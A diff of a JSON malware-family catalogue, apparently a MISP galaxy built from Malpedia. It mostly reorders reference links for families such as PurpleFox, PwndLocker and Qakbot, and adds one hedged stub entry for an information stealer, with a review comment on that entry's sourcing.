- "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt",
+ "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
+ "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
+ "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
- "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
 "https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html",
+ "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
 "https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit",
 "https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html",
- "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware",
- "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html",
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt",
- "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
+ "https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/",
 "https://s.tencent.com/research/report/1322.html",
- "https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/",
- "https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/",
- "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit"
+ "https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/",
+ "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/",
+ "https://twitter.com/C0rk1_H/status/1412801973628272641?s=20",
+ "https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html",
+ "https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
+ "https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html"
 ],
 "synonyms": [],
 "type": []
@@ -39119,7 +40931,7 @@
 "value": "PurpleFox"
 },
 {
- "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user’s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
+ "description": "ZScaler reported on a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user\u2019s system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.\r\n\r\nThe author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave",
@@ -39136,14 +40948,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "http://www.secureworks.com/research/threat-profiles/gold-essex",
- "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
- "https://www.secureworks.com/research/pushdo",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "http://malware-traffic-analysis.net/2017/04/03/index2.html",
+ "https://www.secureworks.com/research/threat-profiles/gold-essex",
 "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/",
- "https://www.secureworks.com/research/threat-profiles/gold-essex"
+ "http://malware-traffic-analysis.net/2017/04/03/index2.html",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.secureworks.com/research/pushdo"
 ],
 "synonyms": [],
 "type": []
@@ -39194,32 +41006,32 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.group-ib.com/blog/prolock_evolution",
- "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
- "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
 "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.group-ib.com/blog/prolock_evolution",
+ "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
+ "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
 "https://www.group-ib.com/blog/prolock",
 "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html",
- "https://www.intrinsec.com/egregor-prolock/",
- "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
- "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji",
- "https://medium.com/s2wlab/operation-synctrek-e5013df8d167",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
- "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
 "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/",
 "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/",
- "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/"
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html",
+ "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
+ "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf",
+ "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/",
+ "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
 ],
 "synonyms": [
 "ProLock"
@@ -39234,10 +41046,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos",
- "https://twitter.com/physicaldrive0/status/573109512145649664",
- "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/",
- "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html"
+ "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html",
+ "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf",
+ "https://twitter.com/physicaldrive0/status/573109512145649664"
 ],
 "synonyms": [],
 "type": []
@@ -39245,6 +41057,19 @@
 "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab",
 "value": "pwnpos"
 },
+ {
+ "description": "Information stealer, based on strings it seems to target crypto currencies, instant messengers, and browser data.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pxrecvoweiwoei",
+ "https://twitter.com/suyog41/status/1688797716447432704"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ac22ee6f-0d15-4edb-8ea5-1675df57597c",
+ "value": "PXRECVOWEIWOEI"
+ },
 {
 "description": "Py2exe built worm propagating via USB drives, having wiper features embedded in the logic (based on today's date being later than 2016-04-03 and existence of a file C:\\txt.txt)",
 "meta": {
@@ -39264,12 +41089,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa",
- "https://bin.re/blog/pykspas-inferior-dga-version/",
- "https://www.youtube.com/watch?v=HfSQlC76_s4",
 "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/",
- "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://www.youtube.com/watch?v=HfSQlC76_s4",
 "https://bin.re/blog/the-dga-of-pykspa/",
- "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/"
+ "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/",
+ "https://blogs.akamai.com/sitr/2019/07/pykspa-v2-dga-updated-to-become-selective.html",
+ "https://bin.re/blog/pykspas-inferior-dga-version/"
 ],
 "synonyms": [],
 "type": []
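Review bot: The new PXRECVOWEIWOEI entry's description is explicitly a guess (`Information stealer, based on strings it seems to target crypto currencies, instant messengers, and browser data.`) and its only ref besides the Malpedia page is a single tweet, so consumers of this galaxy get a capability claim with no corroborating write-up. That is acceptable for a stub, but the hedge is the only signal of its confidence, so the wording should not be tidied into a flat statement by a later sync, and a second reference should be added once a published analysis exists. Leaving `synonyms` and `type` empty matches the neighbouring entries, so no change needed there.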
@@ -39282,14 +41107,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
- "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
+ "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
 "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/",
 "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/",
+ "https://www.bleepingcomputer.com/news/security/pylocky-decryptor-released-by-french-authorities/",
+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/",
- "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html",
 "https://www.cybermalveillance.gouv.fr/nos-articles/outil-dechiffrement-rancongiciel-ransomware-pylocky-v1-2/",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/"
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/"
 ],
 "synonyms": [
 "Locky Locker"
@@ -39304,19 +41129,19 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.pyxie",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
 "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
 "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/",
 "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
 "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3",
 "https://threatvector.cylance.com/en_us/home/meet-pyxie-a-nefarious-new-python-rat.html",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx"
+ "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/2/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
 ],
 "synonyms": [
 "PyXie RAT"
@@ -39344,12 +41169,12 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars",
 "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
- "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
 "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/",
- "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/"
+ "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/",
+ "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/",
+ "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/"
 ],
 "synonyms": [],
 "type": []
@@ -39362,219 +41187,246 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.bleepingcomputer.com/news/security/qbot-needs-only-30-minutes-to-steal-your-credentials-emails/", - "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html", - "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html", - "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike", - "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/", - "https://twitter.com/elisalem9/status/1381859965875462144", - "https://www.zscaler.com/blogs/security-research/rise-qakbot-attacks-traced-evolving-threat-techniques", - "https://documents.trendmicro.com/assets/pdf/Technical-Brief---The-Prelude-to-Ransomware-A-Look-into-Current-QAKBOT-Capabilities-and-Activity.pdf", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/demystifying-qbot-malware.html", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://isc.sans.edu/diary/rss/28568", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", - "https://www.splunk.com/en_us/blog/security/from-macros-to-no-macros-continuous-malware-improvements-by-qakbot.html", - "https://medium.com/walmartglobaltech/qbot-testing-malvertising-campaigns-3e2552cbc69a", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", - 
"https://twitter.com/tylabs/status/1462195377277476871", - "https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://www.malwarology.com/2022/04/qakbot-series-configuration-extraction/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.dsih.fr/article/5020/comment-qbot-revient-en-force-avec-onenote.html", - "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/", "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://blog.group-ib.com/prometheus-tds", - "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", - "https://blog.minerva-labs.com/a-new-datoploader-delivers-qakbot-trojan", - "https://blogs.vmware.com/security/2021/11/telemetry-peak-analyzer-an-automatic-malware-campaign-detector.html", - "https://www.youtube.com/watch?v=OCRyEUhiEyw", - "https://www.elastic.co/security-labs/qbot-configuration-extractor", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://isc.sans.edu/diary/rss/28728", - "https://www.silentpush.com/blog/malicious-infrastructure-as-a-service", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://syrion.me/malware/qakbot-bb-extractor/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - 
"https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html", - "https://twitter.com/embee_research/status/1592067841154756610?s=20", - "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution", - "https://docs.velociraptor.app/blog/2023/2023-04-05-qakbot/", - "https://www.malwarology.com/2022/04/qakbot-series-process-injection/", - "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta", - "https://unit42.paloaltonetworks.com/tutorial-qakbot-infection/", - "https://www.malwarology.com/2022/04/qakbot-series-api-hashing/", - "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://www.malwarology.com/posts/2-qakbot-conf-extraction/", - "https://www.reliaquest.com/blog/qbot-black-basta-ransomware/", - "https://www.malwarology.com/posts/1-qakbot-strings-obfuscation/", - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://www.secureworks.com/research/threat-profiles/gold-lagoon", - "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/", - 
"https://research.loginsoft.com/threat-research/blog-maximizing-threat-detections-of-qakbot-with-osquery/", - "https://www.youtube.com/watch?v=M22c1JgpG-U", - "https://experience.mandiant.com/trending-evil/p/1", - "https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html", - "https://www.bleepingcomputer.com/news/security/qbot-malware-switches-to-new-windows-installer-infection-vector/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://github.com/binref/refinery/blob/master/tutorials/tbr-files.v0x06.Qakbot.Decoder.ipynb", - "https://isc.sans.edu/forums/diary/XLSB+Files+Because+Binary+is+Stealthier+Than+XML/28476/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://www.atomicmatryoshka.com/post/malware-headliners-qakbot", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://www.malwarology.com/2022/04/qakbot-series-string-obfuscation/", - "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", - "https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html", - "https://twitter.com/Corvid_Cyber/status/1455844008081641472", - "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros", - "https://socprime.com/blog/qbot-malware-detection-old-dog-new-tricks/", - 
"https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", - "https://raw.githubusercontent.com/NtQuerySystemInformation/Malware-RE-papers/main/Qakbot%20report.pdf", - "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", - "https://twitter.com/_alex_il_/status/1384094623270727685", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://twitter.com/TheDFIRReport/status/1361331598344478727", - "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/", - "https://bin.re/blog/the-dga-of-qakbot/", - "https://isc.sans.edu/diary/rss/28448", - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://www.elastic.co/security-labs/qbot-malware-analysis", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", - "https://www.elastic.co/de/security-labs/qbot-malware-analysis", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://twitter.com/Unit42_Intel/status/1461004489234829320", - 
"https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", - "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", - "https://www.bleepingcomputer.com/news/security/qbot-phishing-uses-windows-calculator-sideloading-to-infect-devices/", - "https://www.youtube.com/watch?v=iB1psRMtlqg", - "https://twitter.com/kienbigmummy/status/1460537501676802051", - "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", - "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view", - "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot", - "https://www.tidalcyber.com/blog/identifying-and-defending-against-qakbots-evolving-ttps", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/", - "https://twitter.com/embee_research/status/1592067841154756610?s=20&t=hEALPAWr1LIt9pXcVpxjRQ", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware", + "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/", "http://www.secureworks.com/research/threat-profiles/gold-lagoon", - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://blog.talosintelligence.com/following-the-lnk-metadata-trail", - "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", - "https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis", - 
